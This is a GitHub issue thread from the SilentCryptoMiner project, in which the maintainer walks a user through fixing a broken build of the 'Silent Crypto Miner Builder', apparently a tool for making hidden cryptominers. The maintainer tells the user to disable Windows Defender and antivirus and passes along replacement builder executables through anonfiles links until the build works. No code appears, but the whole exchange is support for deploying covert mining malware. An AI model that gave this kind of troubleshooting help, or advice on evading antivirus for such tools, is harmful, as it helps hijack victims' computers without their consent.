### ISSUE TITLE
3.0 Not working?

### ISSUE THREAD

**Issue by alam0111** [UnamSanctam/SilentCryptoMiner#1128]
I tried both the source and the precompiled version.
![image](https://user-images.githubusercontent.com/112485952/188998674-59467be7-29d8-4bd2-9a5a-3ed0f5e0c7d8.png)
It gave another error with the precompiled version but still.

**Comment by UnamSanctam** [comment]
You should build it as "Release", but can you try running it as administrator? Can you also check if the `UCompilers\logs\windres.log` files exist?

**Comment by alam0111** [comment]
Yeah I tried it again...
![image](https://user-images.githubusercontent.com/112485952/189040120-ba52cc77-9f1b-4d8f-8b96-150c4d8d1a10.png)
It looks like it's looking for the "UCompilers" folder though there is no such thing in the "Release" folder.

![image](https://user-images.githubusercontent.com/112485952/189040299-7b04963a-4de1-4190-9b18-3c8745d085f5.png)

**Comment by UnamSanctam** [comment]
It should be extracting the UCompilers folder, make sure that you have enough space on the disk.

**Comment by alam0111** [comment]
Made sure I have enough space on disk but still didn't work.

**Comment by UnamSanctam** [comment]
How much free disk do you have?

**Comment by alam0111** [comment]
170GB using disk D.

**Comment by UnamSanctam** [comment]
Make sure that your antivirus isn't removing anything, and also try building to another folder, the build log will say `Extracting compilers...` while extracting the compilers into the `UCompilers` folder.

**Comment by alam0111** [comment]
I've tried again with the precompiled version and it's still not working... wondering if anyone has this problem aswell. Also can you send the files through anonfiles or something like that?
![image](https://user-images.githubusercontent.com/112485952/189052010-79e12383-44e3-47c3-a522-d5ccb48bf096.png)

**Comment by UnamSanctam** [comment]
And you cannot find the UCompilers folder on the D: drive? Maybe you're in some way running it with another .NET version or something, can you try running this: https://anonfiles.com/Y99di675y6/Silent_Crypto_Miner_Builder_exe? I only added a CreateDirectory even though the ExtractToDirectory should do it automatically (and does so on all my tests). I've tested it on all versions of Windows from Windows 7 to Windows 11 and haven't been able to get your problem. Also make sure to temporarily disable your Windows Defender if you haven't already.

**Comment by UnamSanctam** [comment]
You can also try this one: https://anonfiles.com/55D2ib7by0/Silent_Crypto_Miner_Builder_exe.

**Comment by alam0111** [comment]
And still got the same error.

**Comment by UnamSanctam** [comment]
Hmm, can you take a video or something? I don't get it in any VM or computer I've tested it on.

**Comment by alam0111** [comment]
Here is my recording: https://anonfiles.com/KeN2id7dyd/Screen_Recording_-_Made_with_FlexClip_webm

**Comment by UnamSanctam** [comment]
Ok so as you can see it's trying to access the wrong folder to find UCompilers, now I just have to find out why it's doing that on your computer and VM but not mine.

**Comment by alam0111** [comment]
Run it right now
![image](https://user-images.githubusercontent.com/112485952/189074051-2c899410-f914-4718-8a6c-b388606fee1d.png)

**Comment by UnamSanctam** [comment]
Hmm, well that's not a very specific error, I believe you might be having some problem with relative paths, it seems like your base path is messed up somehow. I'll have to try and create one for you with only absolute paths then, it's just a bit difficult since windres and such don't really support spaces in paths and such which is why it's using relative paths.

**Comment by UnamSanctam** [comment]
Here, try this one: https://anonfiles.com/l8bcj77ayc/Silent_Crypto_Miner_Builder_exe. In this one all the paths are absolute, which also means that I had to implement a check for any space characters, so if the build path has any spaces in it then it will send a warning now.

**Comment by alam0111** [comment]
Ok so this actually worked. I ran it on a vm too. Workes perfect.

**Comment by UnamSanctam** [comment]
Alright great, then it was most likely because of some quirk of relative paths on some systems.

**Comment by alam0111** [comment]
Thanks!
